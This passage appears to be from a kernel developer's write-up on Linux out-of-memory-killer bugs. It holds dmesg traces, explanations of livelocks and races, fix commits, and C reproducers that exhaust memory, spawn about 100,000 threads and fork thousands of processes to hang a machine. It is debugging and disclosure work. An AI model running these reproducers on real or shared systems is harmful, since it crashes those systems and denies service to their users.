retint_kernel+0x1b/0x1d [ 47.094108] [<ffffffff81628837>] ? native_iret+0x7/0x7 [ 47.095108] [<ffffffff810565bb>] __do_page_fault+0x18b/0x440 [ 47.096109] [<ffffffff810568a0>] do_page_fault+0x30/0x80 [ 47.097052] [<ffffffff816297e8>] page_fault+0x28/0x30 [ 47.098544] [<ffffffff81320ae0>] ? __clear_user+0x20/0x50 [ 47.099651] [<ffffffff813254b8>] iov_iter_zero+0x68/0x250 [ 47.100642] [<ffffffff810920f6>] ? sched_clock_cpu+0x86/0xc0 [ 47.101701] [<ffffffff813f9018>] read_iter_zero+0x38/0xa0 [ 47.102754] [<ffffffff81183ec4>] __vfs_read+0xc4/0xf0 [ 47.103684] [<ffffffff81184639>] vfs_read+0x79/0x120 [ 47.104630] [<ffffffff81185350>] SyS_read+0x50/0xc0 [ 47.105503] [<ffffffff8108bd9c>] ? do_sched_setscheduler+0x7c/0xb0 [ 47.106637] [<ffffffff81627cae>] entry_SYSCALL_64_fastpath+0x12/0x71 [ 47.109307] Mem-Info: [ 47.109801] active_anon:416244 inactive_anon:3737 isolated_anon:0 [ 47.109801] active_file:0 inactive_file:474 isolated_file:0 [ 47.109801] unevictable:0 dirty:0 writeback:0 unstable:0 [ 47.109801] slab_reclaimable:1114 slab_unreclaimable:3896 [ 47.109801] mapped:96 shmem:4188 pagetables:1014 bounce:0 [ 47.109801] free:12368 free_pcp:183 free_cma:0 [ 47.118364] Node 0 DMA free:7316kB min:400kB low:500kB high:600kB active_anon:7056kB inactive_anon:232kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:296kB slab_reclaimable:52kB slab_unreclaimable:216kB kernel_stack:16kB pagetables:308kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:28 all_unreclaimable? yes [ 47.129538] lowmem_reserve[]: 0 1731 1731 1731 [ 47.131230] Node 0 DMA32 free:44016kB min:44652kB low:55812kB high:66976kB active_anon:1657920kB inactive_anon:14716kB active_file:0kB inactive_file:32kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774256kB mlocked:0kB dirty:0kB writeback:0kB mapped:384kB shmem:16456kB slab_reclaimable:4404kB slab_unreclaimable:15368kB kernel_stack:3264kB pagetables:3748kB unstable:0kB bounce:0kB free_pcp:796kB local_pcp:56kB free_cma:0kB writeback_tmp:0kB pages_scanned:124 all_unreclaimable? no [ 47.143246] lowmem_reserve[]: 0 0 0 0 [ 47.145175] Node 0 DMA: 17*4kB (UE) 9*8kB (UE) 9*16kB (UEM) 1*32kB (M) 1*64kB (M) 2*128kB (UE) 2*256kB (EM) 2*512kB (EM) 1*1024kB (E) 2*2048kB (EM) 0*4096kB = 7292kB [ 47.152896] Node 0 DMA32: 1009*4kB (UEM) 617*8kB (UEM) 268*16kB (UEM) 118*32kB (UEM) 43*64kB (UEM) 13*128kB (UEM) 11*256kB (UEM) 10*512kB (UM) 12*1024kB (UM) 1*2048kB (U) 0*4096kB = 43724kB [ 47.161214] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 47.163987] 4649 total pagecache pages [ 47.166121] 0 pages in swap cache [ 47.168500] Swap cache stats: add 0, delete 0, find 0/0 [ 47.170238] Free swap = 0kB [ 47.171764] Total swap = 0kB [ 47.173270] 524157 pages RAM [ 47.174520] 0 pages HighMem/MovableOnly [ 47.175930] 76617 pages reserved [ 47.178043] 0 pages hwpoisoned [ 47.179584] [ pid ] uid tgid total_vm rss nr_ptes nr_pmds swapents oom_score_adj name [ 47.182065] [ 3820] 0 3820 10756 168 24 3 0 0 systemd-journal [ 47.184504] [ 3823] 0 3823 10262 101 23 3 0 -1000 systemd-udevd [ 47.186847] [ 3824] 0 3824 27503 33 12 3 0 0 agetty [ 47.189291] [ 3825] 0 3825 8673 84 23 3 0 0 systemd-logind [ 47.191691] [ 3826] 0 3826 21787 154 48 3 0 0 login [ 47.193959] [ 3828] 81 3828 6609 82 18 3 0 -900 dbus-daemon [ 47.196297] [ 3831] 0 3831 28878 93 15 3 0 0 bash [ 47.198573] [ 3850] 0 3850 541715 414661 820 6 0 0 oom-depleter2 [ 47.200915] [ 3851] 0 3851 541715 414661 820 6 0 0 oom-depleter2 [ 47.203410] Out of memory: Kill process 3850 (oom-depleter2) score 900 or sacrifice child [ 47.205695] Killed process 3850 (oom-depleter2) total-vm:2166860kB, anon-rss:1658644kB, file-rss:0kB [ 47.257871] oom-depleter2: page allocation failure: order:0, mode:0x280da [ 47.260006] CPU: 0 PID: 3850 Comm: oom-depleter2 Tainted: G W 4.2.0-rc7-next-20150824+ #85 [ 47.262473] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013 [ 47.265184] 0000000000000000 000000000f39672f ffff880036febbe0 ffffffff81313283 [ 47.267511] 00000000000280da ffff880036febc70 ffffffff81116e04 0000000000000000 [ 47.269815] ffffffff00000000 ffff88007fc19730 ffff880000000004 ffffffff810a30cf [ 47.272019] Call Trace: [ 47.273283] [<ffffffff81313283>] dump_stack+0x4b/0x78 [ 47.275081] [<ffffffff81116e04>] warn_alloc_failed+0xf4/0x150 [ 47.276962] [<ffffffff810a30cf>] ? __wake_up+0x3f/0x50 [ 47.278700] [<ffffffff8111a0bc>] __alloc_pages_nodemask+0x24c/0x930 [ 47.280664] [<ffffffff8115d080>] alloc_pages_vma+0xb0/0x1f0 [ 47.282422] [<ffffffff8113df77>] handle_mm_fault+0x13a7/0x1950 [ 47.284240] [<ffffffff810565bb>] __do_page_fault+0x18b/0x440 [ 47.286036] [<ffffffff810568a0>] do_page_fault+0x30/0x80 [ 47.287693] [<ffffffff816297e8>] page_fault+0x28/0x30 [ 47.289358] Mem-Info: [ 47.290494] active_anon:429031 inactive_anon:3737 isolated_anon:0 [ 47.290494] active_file:0 inactive_file:0 isolated_file:0 [ 47.290494] unevictable:0 dirty:0 writeback:0 unstable:0 [ 47.290494] slab_reclaimable:1114 slab_unreclaimable:3896 [ 47.290494] mapped:96 shmem:4188 pagetables:1014 bounce:0 [ 47.290494] free:0 free_pcp:180 free_cma:0 [ 47.299662] Node 0 DMA free:8kB min:400kB low:500kB high:600kB active_anon:14308kB inactive_anon:232kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:296kB slab_reclaimable:52kB slab_unreclaimable:216kB kernel_stack:16kB pagetables:308kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:28 all_unreclaimable? yes [ 47.309430] lowmem_reserve[]: 0 1731 1731 1731 [ 47.311000] Node 0 DMA32 free:0kB min:44652kB low:55812kB high:66976kB active_anon:1701816kB inactive_anon:14716kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774256kB mlocked:0kB dirty:0kB writeback:0kB mapped:384kB shmem:16456kB slab_reclaimable:4404kB slab_unreclaimable:15368kB kernel_stack:3264kB pagetables:3748kB unstable:0kB bounce:0kB free_pcp:720kB local_pcp:24kB free_cma:0kB writeback_tmp:0kB pages_scanned:5584 all_unreclaimable? yes [ 47.321601] lowmem_reserve[]: 0 0 0 0 [ 47.323166] Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB [ 47.326070] Node 0 DMA32: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB [ 47.329018] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 47.331385] 4189 total pagecache pages [ 47.332896] 0 pages in swap cache [ 47.334262] Swap cache stats: add 0, delete 0, find 0/0 [ 47.335990] Free swap = 0kB [ 47.337390] Total swap = 0kB [ 47.338656] 524157 pages RAM [ 47.339964] 0 pages HighMem/MovableOnly [ 47.341464] 76617 pages reserved [ 47.342808] 0 pages hwpoisoned (...snipped...) [ 93.082032] Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB [ 93.082034] Node 0 DMA32: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB ---------- Example output end ----------
oom-depleter2 is a reproducer which exceptionally requires privileges, in order to read kernel messages with real time priority. But since nothing but strictly controlling the timing will require privileges, it would be possible to reproduce using unprivileged user's process if the timing matches.
After all, since it turned out that it is safe to send SIGKILL signal between task_lock() and task_unlock(), this bug was fixed by commit 426fb5e72d92b868 ("mm/oom_kill.c: reverse the order of setting TIF_MEMDIE and sending SIGKILL").
When asynchronous memory reclaim by kswapd cannot catch up, memory is synchronously reclaimed using direct reclaim. Therefore, when a lot of processes started memory allocation requests at the same time, they all will do direct reclaim. As a result, especially with kernels built with CONFIG_PREEMPT=y in order to improve response delay, the OOM killer cannot complete processing the operation within realistic duration when the OOM killer is invoked. And, this bug still remains even after the OOM reaper was introduced.
---------- oom_preempt.c ---------- #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <sched.h> #include <sys/mman.h> static cpu_set_t set = { { 1 } }; /* Allow only CPU 0. */ static char filename[32] = { }; /* down_read(&mm->mmap_sem) requester. */ static int reader(void *unused) { const int fd = open(filename, O_RDONLY); char buffer[128]; sched_setaffinity(0, sizeof(set), &set); sleep(2); while (pread(fd, buffer, sizeof(buffer), 0) > 0); while (1) pause(); return 0; } /* down_write(&mm->mmap_sem) requester. */ static int writer(void *unused) { const int fd = open("/proc/self/exe", O_RDONLY); sleep(2); while (1) { void *ptr = mmap(NULL, 4096, PROT_READ, MAP_PRIVATE, fd, 0); munmap(ptr, 4096); } return 0; } static void my_clone(int (*func) (void *)) { char *stack = malloc(4096); if (stack) clone(func, stack + 4096, CLONE_THREAD | CLONE_SIGHAND | CLONE_VM, NULL); } /* Memory consumer for invoking the OOM killer. */ static void memory_eater(void) { char *buf = NULL; unsigned long i; unsigned long size = 0; sleep(4); for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) { char *cp = realloc(buf, size); if (!cp) { size >>= 1; break; } buf = cp; } fprintf(stderr, "Start eating memory\n"); for (i = 0; i < size; i += 4096) buf[i] = '\0'; /* Will cause OOM due to overcommit */ } int main(int argc, char *argv[]) { int i; const pid_t pid = fork(); if (pid == 0) { for (i = 0; i < 9; i++) my_clone(writer); writer(NULL); _exit(0); } else if (pid > 0) { snprintf(filename, sizeof(filename), "/proc/%u/stat", pid); for (i = 0; i < 100000; i++) my_clone(reader); } memory_eater(); return *(char *) NULL; /* Not reached. */ } ---------- oom_preempt.c ----------
---------- Example output start ---------- [ 54.702339] oom_preempt invoked oom-killer: gfp_mask=0x24201ca(GFP_HIGHUSER_MOVABLE|__GFP_COLD), order=0, oom_score_adj=0 [ 54.705590] oom_preempt cpuset=/ mems_allowed=0 [ 74.525856] CPU: 0 PID: 4436 Comm: oom_preempt Not tainted 4.7.0-rc5 #57 [ 74.528056] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013 [ 74.530951] 0000000000000286 00000000a8634c59 ffff88007a8ab9f8 ffffffff812c32a7 [ 74.533292] ffff88007a8abbe0 0000000000000000 ffff88007a8aba90 ffffffff81188781 [ 74.535723] ffffffff810fde71 0000000000000001 0000000000000003 ffff88007fffdb10 [ 74.538167] Call Trace: [ 74.539653] [<ffffffff812c32a7>] dump_stack+0x4f/0x68 [ 74.541537] [<ffffffff81188781>] dump_header+0x5b/0x200 [ 74.543392] [<ffffffff810fde71>] ? delayacct_end+0x51/0x60 [ 74.545329] [<ffffffff8108041e>] ? preempt_count_add+0x9e/0xb0 [ 74.547618] [<ffffffff815dce13>] ? _raw_spin_unlock_irqrestore+0x13/0x30 [ 74.549894] [<ffffffff811187d1>] oom_kill_process+0x221/0x420 [ 74.551888] [<ffffffff81117e1b>] ? find_lock_task_mm+0x4b/0x80 [ 74.553936] [<ffffffff81118cad>] out_of_memory+0x28d/0x480 [ 74.556059] [<ffffffff8111d20a>] __alloc_pages_nodemask+0xa5a/0xc20 [ 74.558245] [<ffffffff811143ff>] ? __page_cache_alloc+0xaf/0xc0 [ 74.560278] [<ffffffff81162563>] alloc_pages_current+0x83/0x110 [ 74.562319] [<ffffffff811143ff>] __page_cache_alloc+0xaf/0xc0 [ 74.564328] [<ffffffff81116fda>] filemap_fault+0x27a/0x500 [ 74.566237] [<ffffffff81246859>] xfs_filemap_fault+0x39/0x60 [ 74.568308] [<ffffffff8113d58e>] __do_fault+0x6e/0xf0 [ 74.570182] [<ffffffff8114236c>] handle_mm_fault+0x163c/0x2280 [ 74.572131] [<ffffffff815d8fc9>] ? __schedule+0x1c9/0x590 [ 74.574015] [<ffffffff810497bd>] __do_page_fault+0x19d/0x510 [ 74.575898] [<ffffffff81049b51>] do_page_fault+0x21/0x70 [ 74.577656] [<ffffffff8100259d>] ? do_syscall_64+0xed/0xf0 [ 74.579503] [<ffffffff815de9b2>] page_fault+0x22/0x30 [ 240.447847] INFO: task oom_reaper:47 blocked for more than 120 seconds. [ 240.450075] Not tainted 4.7.0-rc5 #57 [ 240.451571] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message. [ 240.453723] oom_reaper D ffff88007cdb3ce8 0 47 2 0x00000000 [ 240.455892] ffff88007cdb3ce8 ffff88007cdb3d10 ffff88007cdb4000 ffffffff8183f824 [ 240.458302] ffff88007cce6a00 00000000ffffffff ffffffff8183f828 ffff88007cdb3d00 [ 240.460546] ffffffff815d93ca ffffffff8183f820 ffff88007cdb3d10 ffffffff815d9783 [ 240.462840] Call Trace: [ 240.463963] [<ffffffff815d93ca>] schedule+0x3a/0x90 [ 240.465586] [<ffffffff815d9783>] schedule_preempt_disabled+0x13/0x20 [ 240.467430] [<ffffffff815db2e0>] __mutex_lock_slowpath+0xa0/0x150 [ 240.469236] [<ffffffff815db3a2>] mutex_lock+0x12/0x22 [ 240.470843] [<ffffffff81117eba>] __oom_reap_task+0x6a/0x1e0 [ 240.472730] [<ffffffff8107fc8e>] ? finish_task_switch+0x1be/0x220 [ 240.476670] [<ffffffff8108041e>] ? preempt_count_add+0x9e/0xb0 [ 240.478486] [<ffffffff815dd028>] ? _raw_spin_lock_irqsave+0x18/0x40 [ 240.480660] [<ffffffff811183f6>] oom_reaper+0x86/0x170 [ 240.482313] [<ffffffff8109b400>] ? prepare_to_wait_event+0xf0/0xf0 [ 240.484137] [<ffffffff81118370>] ? exit_oom_victim+0x50/0x50 [ 240.485837] [<ffffffff8107b5e3>] kthread+0xd3/0xf0 [ 240.487417] [<ffffffff815dd50f>] ret_from_fork+0x1f/0x40 [ 240.489090] [<ffffffff8107b510>] ? kthread_create_on_node+0x1a0/0x1a0 [ 299.096125] Mem-Info: [ 299.097266] active_anon:392824 inactive_anon:2094 isolated_anon:0 [ 299.097266] active_file:0 inactive_file:0 isolated_file:0 [ 299.097266] unevictable:0 dirty:0 writeback:0 unstable:0 [ 299.097266] slab_reclaimable:1744 slab_unreclaimable:10750 [ 299.097266] mapped:369 shmem:2160 pagetables:2098 bounce:0 [ 299.097266] free:12955 free_pcp:159 free_cma:0 [ 341.098578] Node 0 DMA free:7260kB min:404kB low:504kB high:604kB active_anon:6708kB inactive_anon:108kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:108kB slab_reclaimable:20kB slab_unreclaimable:408kB kernel_stack:688kB pagetables:432kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:20 all_unreclaimable? yes [ 360.494674] INFO: task oom_reaper:47 blocked for more than 120 seconds. [ 360.494675] Not tainted 4.7.0-rc5 #57 [ 360.494676] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message. [ 360.494678] oom_reaper D ffff88007cdb3ce8 0 47 2 0x00000000 [ 360.494680] ffff88007cdb3ce8 ffff88007cdb3d10 ffff88007cdb4000 ffffffff8183f824 [ 360.494681] ffff88007cce6a00 00000000ffffffff ffffffff8183f828 ffff88007cdb3d00 [ 360.494682] ffffffff815d93ca ffffffff8183f820 ffff88007cdb3d10 ffffffff815d9783 [ 360.494683] Call Trace: [ 360.494689] [<ffffffff815d93ca>] schedule+0x3a/0x90 [ 360.494690] [<ffffffff815d9783>] schedule_preempt_disabled+0x13/0x20 [ 360.494691] [<ffffffff815db2e0>] __mutex_lock_slowpath+0xa0/0x150 [ 360.494693] [<ffffffff815db3a2>] mutex_lock+0x12/0x22 [ 360.494695] [<ffffffff81117eba>] __oom_reap_task+0x6a/0x1e0 [ 360.494697] [<ffffffff8107fc8e>] ? finish_task_switch+0x1be/0x220 [ 360.494698] [<ffffffff8108041e>] ? preempt_count_add+0x9e/0xb0 [ 360.494700] [<ffffffff815dd028>] ? _raw_spin_lock_irqsave+0x18/0x40 [ 360.494701] [<ffffffff811183f6>] oom_reaper+0x86/0x170 [ 360.494703] [<ffffffff8109b400>] ? prepare_to_wait_event+0xf0/0xf0 [ 360.494705] [<ffffffff81118370>] ? exit_oom_victim+0x50/0x50 [ 360.494706] [<ffffffff8107b5e3>] kthread+0xd3/0xf0 [ 360.494708] [<ffffffff815dd50f>] ret_from_fork+0x1f/0x40 [ 360.494709] [<ffffffff8107b510>] ? kthread_create_on_node+0x1a0/0x1a0 [ 391.435178] BUG: workqueue lockup - pool cpus=3 node=0 flags=0x0 nice=0 stuck for 86s! [ 391.435180] Showing busy workqueues and worker pools: [ 391.435181] workqueue events: flags=0x0 [ 391.435186] pwq 6: cpus=3 node=0 flags=0x0 nice=0 active=2/256 [ 391.435196] pending: vmpressure_work_fn, vmstat_shepherd [ 391.435200] workqueue events_freezable_power_: flags=0x84 [ 391.435201] pwq 4: cpus=2 node=0 flags=0x0 nice=0 active=1/256 [ 391.435205] in-flight: 30:disk_events_workfn [ 391.435226] workqueue xfs-eofblocks/sda1: flags=0xc [ 391.435227] pwq 6: cpus=3 node=0 flags=0x0 nice=0 active=1/256 [ 391.435231] in-flight: 72:xfs_eofblocks_worker [ 391.435234] pool 4: cpus=2 node=0 flags=0x0 nice=0 hung=0s workers=4 idle: 7916 214 105 [ 391.435236] pool 6: cpus=3 node=0 flags=0x0 nice=0 hung=86s workers=2 manager: 77 [ 421.515615] BUG: workqueue lockup - pool cpus=3 node=0 flags=0x0 nice=0 stuck for 116s! [ 421.515617] Showing busy workqueues and worker pools: [ 421.515618] workqueue events: flags=0x0 [ 421.515620] pwq 6: cpus=3 node=0 flags=0x0 nice=0 active=2/256 [ 421.515627] pending: vmpressure_work_fn, vmstat_shepherd [ 421.515631] workqueue events_power_efficient: flags=0x80 [ 421.515633] pwq 6: cpus=3 node=0 flags=0x0 nice=0 active=1/256 [ 421.515636] pending: check_lifetime [ 421.515637] workqueue events_freezable_power_: flags=0x84 [ 421.515638] pwq 4: cpus=2 node=0 flags=0x0 nice=0 active=1/256 [ 421.515641] in-flight: 30:disk_events_workfn [ 421.515657] workqueue xfs-eofblocks/sda1: flags=0xc [ 421.515659] pwq 6: cpus=3 node=0 flags=0x0 nice=0 active=1/256 [ 421.515662] in-flight: 72:xfs_eofblocks_worker [ 421.515666] pool 4: cpus=2 node=0 flags=0x0 nice=0 hung=0s workers=4 idle: 7916 214 105 [ 421.515667] pool 6: cpus=3 node=0 flags=0x0 nice=0 hung=116s workers=2 manager: 77 [ 451.596127] BUG: workqueue lockup - pool cpus=3 node=0 flags=0x0 nice=0 stuck for 146s! [ 451.596129] Showing busy workqueues and worker pools: [ 451.596130] workqueue events: flags=0x0 [ 451.596151] pwq 6: cpus=3 node=0 flags=0x0 nice=0 active=2/256 [ 451.596158] pending: vmpressure_work_fn, vmstat_shepherd [ 451.596162] workqueue events_power_efficient: flags=0x80 [ 451.596163] pwq 6: cpus=3 node=0 flags=0x0 nice=0 active=1/256 [ 451.596166] pending: check_lifetime [ 451.596167] workqueue events_freezable_power_: flags=0x84 [ 451.596168] pwq 4: cpus=2 node=0 flags=0x0 nice=0 active=1/256 [ 451.596172] in-flight: 30:disk_events_workfn [ 451.596187] workqueue xfs-eofblocks/sda1: flags=0xc [ 451.596188] pwq 6: cpus=3 node=0 flags=0x0 nice=0 active=1/256 [ 451.596191] in-flight: 72:xfs_eofblocks_worker [ 451.596194] pool 4: cpus=2 node=0 flags=0x0 nice=0 hung=0s workers=4 idle: 7916 214 105 [ 451.596196] pool 6: cpus=3 node=0 flags=0x0 nice=0 hung=146s workers=2 manager: 77 [ 480.496878] INFO: task oom_reaper:47 blocked for more than 120 seconds. [ 480.496879] Not tainted 4.7.0-rc5 #57 [ 480.496880] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message. [ 480.496883] oom_reaper D ffff88007cdb3ce8 0 47 2 0x00000000 [ 480.496885] ffff88007cdb3ce8 ffff88007cdb3d10 ffff88007cdb4000 ffffffff8183f824 [ 480.496886] ffff88007cce6a00 00000000ffffffff ffffffff8183f828 ffff88007cdb3d00 [ 480.496887] ffffffff815d93ca ffffffff8183f820 ffff88007cdb3d10 ffffffff815d9783 [ 480.496888] Call Trace: [ 480.496893] [<ffffffff815d93ca>] schedule+0x3a/0x90 [ 480.496895] [<ffffffff815d9783>] schedule_preempt_disabled+0x13/0x20 [ 480.496896] [<ffffffff815db2e0>] __mutex_lock_slowpath+0xa0/0x150 [ 480.496897] [<ffffffff815db3a2>] mutex_lock+0x12/0x22 [ 480.496900] [<ffffffff81117eba>] __oom_reap_task+0x6a/0x1e0 [ 480.496904] [<ffffffff8107fc8e>] ? finish_task_switch+0x1be/0x220 [ 480.496905] [<ffffffff8108041e>] ? preempt_count_add+0x9e/0xb0 [ 480.496907] [<ffffffff815dd028>] ? _raw_spin_lock_irqsave+0x18/0x40 [ 480.496908] [<ffffffff811183f6>] oom_reaper+0x86/0x170 [ 480.496911] [<ffffffff8109b400>] ? prepare_to_wait_event+0xf0/0xf0 [ 480.496912] [<ffffffff81118370>] ? exit_oom_victim+0x50/0x50 [ 480.496915] [<ffffffff8107b5e3>] kthread+0xd3/0xf0 [ 480.496917] [<ffffffff815dd50f>] ret_from_fork+0x1f/0x40 [ 480.496918] [<ffffffff8107b510>] ? kthread_create_on_node+0x1a0/0x1a0 (Notice that "Out of memory: Kill process" line is not yet printed despite 7 minutes has elapsed after "invoked oom-killer:" line is printed.) ---------- Example output end ----------
Allocating/releasing memory are very vert frequently occurring operations. Also, since Linux is designed to be able to run on systems with only one CPU to thousands of CPUs. If we use global variables and update with exclusion control in order to track memory usage (vmstat), it will cause significant performance penalty. Therefore, in order to avoid performance problem, memory usage is maintained per CPU basis, and is synchronized periodically or as needed basis. And, vmstat_update work request is sent to system_wq workquewue upon periodic synchronization.
But when the system_wq workqueue is processing some other work request, that workqueue cannot process vmstat_update work request. As a result, when some work request is doing memory allocation, memory usage is forever never updated because vmstat_update work request cannot be processed, but the in-flight allocation request forever sees outdated memory usage and forever retries due to the "too small to fail" memory-allocation rule. As a result, the system enters into infinite loop without being able to invoke the OOM killer.
---------- Example output start ---------- [ 271.579276] MemAlloc: kworker/0:56(7399) gfp=0x2400000 order=0 delay=129294 [ 271.581237] ffff88007c78fa08 ffff8800778f8c80 ffff88007c790000 ffff8800778f8c80 [ 271.583329] 0000000002400000 0000000000000000 ffff8800778f8c80 ffff88007c78fa20 [ 271.585391] ffffffff8162aa9d 0000000000000001 ffff88007c78fa30 ffffffff8162aac7 [ 271.587463] Call Trace: [ 271.588512] [<ffffffff8162aa9d>] preempt_schedule_common+0x18/0x2b [ 271.590243] [<ffffffff8162aac7>] _cond_resched+0x17/0x20 [ 271.591830] [<ffffffff8111fafe>] __alloc_pages_nodemask+0x64e/0xcc0 [ 271.593561] [<ffffffff8116a3b2>] ? __kmalloc+0x22/0x190 [ 271.595119] [<ffffffff81160ce7>] alloc_pages_current+0x87/0x110 [ 271.596778] [<ffffffff812e95f4>] bio_copy_kern+0xc4/0x180 [ 271.598342] [<ffffffff810a6a00>] ? wait_woken+0x80/0x80 [ 271.599878] [<ffffffff812f25f0>] blk_rq_map_kern+0x70/0x130 [ 271.601481] [<ffffffff812ece35>] ? blk_get_request+0x75/0xe0 [ 271.603100] [<ffffffff814433fd>] scsi_execute+0x12d/0x160 [ 271.604657] [<ffffffff81443524>] scsi_execute_req_flags+0x84/0xf0 [ 271.606339] [<ffffffffa01db742>] sr_check_events+0xb2/0x2a0 [sr_mod] [ 271.608141] [<ffffffff8109cbfc>] ? set_next_entity+0x6c/0x6a0 [ 271.609830] [<ffffffffa01cf163>] cdrom_check_events+0x13/0x30 [cdrom] [ 271.611610] [<ffffffffa01dbb85>] sr_block_check_events+0x25/0x30 [sr_mod] [ 271.613429] [<ffffffff812fc7eb>] disk_check_events+0x5b/0x150 [ 271.615065] [<ffffffff812fc8f1>] disk_events_workfn+0x11/0x20 [ 271.616699] [<ffffffff810827c5>] process_one_work+0x135/0x310 [ 271.618321] [<ffffffff81082abb>] worker_thread+0x11b/0x4a0 [ 271.620018] [<ffffffff810829a0>] ? process_one_work+0x310/0x310 [ 271.622022] [<ffffffff81087e53>] kthread+0xd3/0xf0 [ 271.623533] [<ffffffff81087d80>] ? kthread_create_on_node+0x1a0/0x1a0 [ 271.625487] [<ffffffff8162f09f>] ret_from_fork+0x3f/0x70 [ 271.627175] [<ffffffff81087d80>] ? kthread_create_on_node+0x1a0/0x1a0 ---------- Example output end ----------
The output above by kmallocwd reports a situation that a workqueue which is doing GFP_NOIO memory allocation request is retrying for so far 129 seconds. Judging from my experience of reproducing various OOM livelock situations, the system is presumably already in OOM livelock situation if disk_events_workfn() function keeps calling __alloc_pages_nodemask() function and waiting for more unlikely helps. (The reason I wrote "A drive recognized as /dev/sr0" at Target environments is that the management task for CD-ROM drive shall periodically issue GFP_NOIO memory allocation request so that we can obtain traces like shown above.)
This situation is the similar cause with unable to invoke the OOM killer using SysRq-f. It is difficult to imagine the behavior when all workqueues working like handyman became busy. If each work item is assigned a dedicated workqueue, we would be able to avoid "never processed forever" problem, but at the same time we are wasting resources.
Since we cannot leave this problem unresolved, a dedicated workqueue for vmstat work item was assigned. In particular, commit 373ccbe5927034b5 ("mm, vmstat: allow WQ concurrency to discover memory reclaim doesn't make any progress"), commit 751e5f5c753e8d44 ("vmstat: allocate vmstat_wq before it is used") and commit 564e81a57f9788b1 ("mm, vmstat: fix wrong WQ sleep when memory reclaim doesn't make any progress") are applied. Note that this problem affects RHEL 6/7.
This is a problem which was discovered at the same time with abovementioned vmstat_update problem. In order to avoid OOM livelock situation, judgement for whether to retry the allocation request before invoking the OOM killer was modified to be stricter in stages. While testing the modification, it turned out that the OOM killer is trivially and prematurely invoked, even without memory pressure, by simply repeating file I/O.
---------- fileio2.c ---------- #include <stdio.h> #include <string.h> #include <stdlib.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <signal.h> int main(int argc, char *argv[]) { int i; static char buffer[4096]; signal(SIGCHLD, SIG_IGN); for (i = 0; i < 2; i++) { int fd; int j; snprintf(buffer, sizeof(buffer), "/tmp/file.%u", i); fd = open(buffer, O_RDWR | O_CREAT, 0600); memset(buffer, 0, sizeof(buffer)); for (j = 0; j < 1048576 * 1000 / 4096; j++) /* 1000 is MemTotal / 2 */ write(fd, buffer, sizeof(buffer)); close(fd); } for (i = 0; i < 2; i++) { if (fork() == 0) { int fd; snprintf(buffer, sizeof(buffer), "/tmp/file.%u", i); fd = open(buffer, O_RDWR); memset(buffer, 0, sizeof(buffer)); while (fd != EOF) { lseek(fd, 0, SEEK_SET); while (read(fd, buffer, sizeof(buffer)) == sizeof(buffer)); } _exit(0); } } if (fork() == 0) { execl("./fork", "./fork", NULL); _exit(1); } if (fork() == 0) { sleep(1); execl("./fork", "./fork", NULL); _exit(1); } while (1) system("pidof fork | wc"); return 0; } ---------- fileio2.c ----------
---------- fork.c ---------- #include <unistd.h> #include <signal.h> int main(int argc, char *argv[]) { int i; signal(SIGCHLD, SIG_IGN); while (1) { sleep(5); for (i = 0; i < 2000; i++) { if (fork() == 0) { sleep(3); _exit(0); } } } } ---------- fork.c ----------
---------- Example output start ---------- [ 277.863985] Node 0 DMA32 free:20128kB min:5564kB low:6952kB high:8344kB active_anon:108332kB inactive_anon:8252kB active_file:985160kB inactive_file:615436kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:2021100kB mlocked:0kB dirty:4kB writeback:0kB mapped:5904kB shmem:8524kB slab_reclaimable:52088kB slab_unreclaimable:59748kB kernel_stack:31280kB pagetables:55708kB unstable:0kB bounce:0kB free_pcp:1056kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 277.884512] Node 0 DMA32: 3438*4kB (UME) 791*8kB (UME) 3*16kB (UM) 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 20128kB [ 291.331040] Node 0 DMA32 free:29500kB min:5564kB low:6952kB high:8344kB active_anon:126756kB inactive_anon:8252kB active_file:821500kB inactive_file:604016kB unevictable:0kB isolated(anon):0kB isolated(file):0kB 